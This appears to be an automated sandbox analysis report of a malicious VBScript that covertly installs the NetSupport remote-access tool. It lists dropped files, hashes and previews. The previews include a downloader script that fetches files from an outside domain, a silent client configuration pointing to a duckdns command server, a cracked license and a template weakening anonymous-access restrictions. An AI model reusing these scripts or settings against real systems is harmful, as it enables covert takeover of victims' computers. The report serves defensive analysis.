                                                                                                                    SHA-512:890973D08EA2D02C88356CE75C64B608E05B153EDFD83C748A407E965A781321198D91A09C6573E9EEE1A3853A7C92E0283F9556878DF3C5776FDEBA78659A18
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):345056
                                                                                                                    Entropy (8bit):6.291223638483511
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:I8RXllwWOZL6CrguQ4fPBIT2TxwyJMIL39+/ziP+9iBIcUaemeL:IUXDIZmydPTvb4RAVcbL
                                                                                                                    MD5:96E987D909600D34DD70C55F56EB8869
                                                                                                                    SHA1:3278FFE286AD6894685D5C4248E2E4EBB729E4E2
                                                                                                                    SHA-256:E627780C49513DFDDF394A5FE929C67D527256AF7407F2AE6CFA6A6996859F9A
                                                                                                                    SHA-512:DA9BE7015AAB9C447D5A72067BD6704165C56F3E355BA62018F809E6B7F0DC2D20040419A1366CB5DDAFA1EB6CEB51173EF382D214F130F6CA06175747B4B60A
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):97376
                                                                                                                    Entropy (8bit):6.023234574132757
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:hkybYM1RAFHKrvngTwjhVkHtf0Y8L2dwz/ET9HB1kzQNlkm2aDCCR:7kM1RAFHKrvnYwjhVkHtsYU2dwoTZ3bb
                                                                                                                    MD5:52B88EB20BEB3B34A692A4CAE0FF2196
                                                                                                                    SHA1:26A297B2BAEB118F8856C1DE41EE855572BA958A
                                                                                                                    SHA-256:2B675E9C27D3FB01CB9DF2583B380DE8DC8C0D5BBBE18AF458F90B47C6D62B03
                                                                                                                    SHA-512:29567FC4DB46D85F9AB8F6ECF2A708EC2C8DEF2E49ECCD439DACEDA327B7411957B2014171A8370C3928D4A03A13BC6124D93678A87684370A5E6042D1C2AD6E
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):70240
                                                                                                                    Entropy (8bit):5.649795184953094
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:p8c59WTkwv6MY2d7kz/ET9Hx2aOlP30Bhs1RQuX210ze9MQN7Z2ym+4lcf7xl8uF:qqi8L2dwz/ET9HB1kzQNlkYjaDCCM
                                                                                                                    MD5:9A348ED02F8B1EFC9BFC5F53827F8A9C
                                                                                                                    SHA1:C1F22705392AF57B277D1FB4F46258DDDFFE8F33
                                                                                                                    SHA-256:641F2B86F013A95707FFDF0F584E3A83FEDC1392CEA3B546905B9CCB54AE10CF
                                                                                                                    SHA-512:9DEBB460FD74CB586ED66B7FA4BBB51A8E1184C1A061E81F4FD6F5E700FDB1E91B809A3F517FE55DD889F60DF6EA29190455073DFA1CB5B85032B91EFD12033F
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:PEM certificate
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):33990
                                                                                                                    Entropy (8bit):5.9765409918599
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:Wx9cmQ3vUSF9Dd0YmIwJC8xNWKUFOdxJwuICxFys:WixFWJLbWK0OdApCxL
                                                                                                                    MD5:7DE039871EB7B045E08360A820733E8F
                                                                                                                    SHA1:E1F85B993B87C81CB3B04A35CFCF751128218C79
                                                                                                                    SHA-256:FA69A6EC5798B978B4D7ED2D22DFFCB2E8F8D14146C2E4BE7C17245DD52955FC
                                                                                                                    SHA-512:A6BA3DBCFAA53BEFB23162B2CE052E282EAAB404C9D1AFED0A7E2A8CA8521635575AEB116FE553FB5FD7FD67ADAB231F6CB821F8937152A0D474E60FDC7FFE4B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vrep[1].msi, Author: Joe Security
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):837
                                                                                                                    Entropy (8bit):5.545169772353752
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                                                    MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                                                    SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                                                    SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                                                    SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                                                    Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2891
                                                                                                                    Entropy (8bit):4.051212311792211
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:ez+xD8KvBvtvUlvLvMIlubCKvBvtvUlvgvPxI1iKvBvtvUlvKvCwQY1J:e2rZFMlzXMtZFMlonq1hZFMlCqBYz
                                                                                                                    MD5:905AD4C0382EAE16DF4C0DEA8E4D2FCC
                                                                                                                    SHA1:6597192580595528A3A24CF94C4B44E44CFA6BE4
                                                                                                                    SHA-256:49F4E7CDD3716A8E33A6659DAA709606A4D74AE84525FA395EFD8687F7E9D2AE
                                                                                                                    SHA-512:CC5784D1DA871001A838D9EA2AC774CC727CB0D0F8CB76F05AE76FD35FD4BFF86BF3418B4ABF32F9477F25FBB7710A3FC961072CC95E1A4AFD83C7A19DCBAA09
                                                                                                                    Malicious:true
                                                                                                                    Preview:On Error Resume Next.. Dim xmlHttp, fileSystem, tempFolder, targetFile, binaryStream, nsmFile, clientFile.... ' init.. Set xmlHttp = CreateObject("MSXML2.XMLHTTP").. Set fileSystem = CreateObject("Scripting.FileSystemObject").. Set tempFolder = fileSystem.GetSpecialFolder(2) ' Folder %TEMP%.... ' dl NSM.lic.. nsmFile = tempFolder & "\NSM.lic".. xmlHttp.Open "GET", "https://okolinabeauty.com/choh/NSM.lic", False.. xmlHttp.Send.. If xmlHttp.Status = 200 Then.. Set binaryStream = CreateObject("ADODB.Stream").. binaryStream.Type = 1 ' bin.. binaryStream.Open.. binaryStream.Write xmlHttp.responseBody.. binaryStream.SaveToFile nsmFile, 2.. binaryStream.Close.. End If.... ' dl Client32.ini..
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):837
                                                                                                                    Entropy (8bit):5.545169772353752
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                                                    MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                                                    SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                                                    SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                                                    SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):7454
                                                                                                                    Entropy (8bit):5.306529657572736
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:RYvnYKY7YuY8YAYzhY8Y3YpYsULTYdYfYpQYPNYKYZ3YYkYRY1Yn6U8bYWYFYLY0:RabeTtREhzaeKLTYiXQNJHFCK4SxgezD
                                                                                                                    MD5:B2D1EAE601A80EF3A192ED03212226BB
                                                                                                                    SHA1:528905D11115CA7B572E8662D420538962547C6E
                                                                                                                    SHA-256:EE3393232FE588D8BFCC6C0F0E5DC380D3F1A15788AAECD015A9E2784AD27B55
                                                                                                                    SHA-512:4B750FC32E05F0DDA04724F42E34D3411F9118DD9A0AA2CE7B4BC28C002EB81EC88B8ED5043D09F026875FF4B42770AB9DD9C3D6C0653CA96829ABF4A5FAFA75
                                                                                                                    Malicious:false
                                                                                                                    Preview:[DLL31]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TutorDeskIcon",STRING..Arg2=in,[TUTORDESKICON],STRING..Arg3=out,[TUTORDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL30]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TechConsoleDeskIcon",STRING..Arg2=in,[TECHCONSOLEDESKICON],STRING..Arg3=out,[TECHCONSOLEDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL29]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"ControlDeskIcon",STRING..Arg2=in,[CONTROLDESKICON],STRING..Arg3=out,[CONTROLDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL28]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStrin
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                                                    Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Temp\vrep.msi, Author: Joe Security
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):837
                                                                                                                    Entropy (8bit):5.545169772353752
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                                                    MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                                                    SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                                                    SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                                                    SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):25
                                                                                                                    Entropy (8bit):4.243856189774724
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:tekKKv0ov:JR8y
                                                                                                                    MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                                                    SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                                                    SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                                                    SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                                                    Malicious:false
                                                                                                                    Preview:[Client]..RoomSpec=Eval..
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):928
                                                                                                                    Entropy (8bit):3.5084050573465384
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Q+eS1kWlWlp+an4gb0mfkPz4lmfkPVvmfkPVWmfs8xU37+NylWl8ajEiRFGjowA:Q+eS3WTr4gtc79cAc9U8E+AW1EMAFA
                                                                                                                    MD5:0973EE7629C5602C2CAF0146AC93058C
                                                                                                                    SHA1:2586483C867FC413132E6874C59A75B027E90FBF
                                                                                                                    SHA-256:2DA5A8A9B0708F1AEBF60379A04E46BF33C5B06DD64916C4EB4F321E34C7E631
                                                                                                                    SHA-512:D92DF68440D735836135F08F256783452ABDE2DC66163C693C2AEA144A7D7463C0F765E4AA684E07315799FB62E194B076F631BAF8229ECEC13E88A366638D7A
                                                                                                                    Malicious:false
                                                                                                                    Preview:[Unicode]..Unicode=yes..[System Access]..LSAAnonymousNameLookup = 1..[Registry Values]..MACHINE\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous=4,1..MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,0..MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM=4,0..MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RestrictNullSessAccess=4,0..[Privilege Rights]..[Version]..signature="$CHICAGO$"..Revision=1..
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):506
                                                                                                                    Entropy (8bit):4.906453708261214
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                                                    MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                                                    SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                                                    SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                                                    SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                                                    Malicious:false
                                                                                                                    Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:MS Windows HtmlHelp Data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):157303
                                                                                                                    Entropy (8bit):7.89872596637976
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:duYWawdwZ7n0IjSTIvtFgSHcvCq1vdJojjXwDWaSRKjG88gs9A6BmgOUy:dI6Z7NvXcDJPo2WaMuXts9mUy
                                                                                                                    MD5:A9B2B2B4D72B44C182FF8403C97078BD
                                                                                                                    SHA1:808BE17D64883BF0B550B4B2E621D206736421D0
                                                                                                                    SHA-256:B86947F654351E605ACF0E3D09A00B4A20648CA60168476D1FBE6C4D9EEFE300
                                                                                                                    SHA-512:9459F723ACE5CFBEA23FC66738954A2383C730517486E3DE1F5CE70F48CDF039204683CA19E60FEA76616500CC7C82242051ABC04CC0F8D66BCDC46069AB9CBC
                                                                                                                    Malicious:false
                                                                                                                    Preview:ITSF....`..................|.{.......".....|.{......."..`...............x.......T.......................wf..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...M.../#ITBITS..../#IVB...-../#STRINGS...q.l./#SYSTEM....G./#TOPICS...M.`./#URLSTR...5.<./#URLTBL...-.../#WINDOWS...a.L./$FIftiMain...|..Q./$OBJINST...=.?./$WWAssociativeLinks/..../$WWAssociativeLinks/BTree...C.L./$WWAssociativeLinks/Data......./$WWAssociativeLinks/Map....../$WWAssociativeLinks/Property.... ./$WWKeywordLinks/..../$WWKeywordLinks/BTree...I.L./$WWKeywordLinks/Data......./$WWKeywordLinks/Map....../$WWKeywordLinks/Property...# !/conventions_and_terminology.html....../default.css.....O$/existing_installation_detected.html.....b./helpman_settings.js...~.[./helpman_topicinit.js......@./hm_btn_navigate_next.png...Y.../hm_btn_navigate_next_d.png...X.m /hm_btn_navigate_next_orange.png...E.m./hm_btn_navigate_prev.png...2.../hm_btn_navigate_prev_
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):642
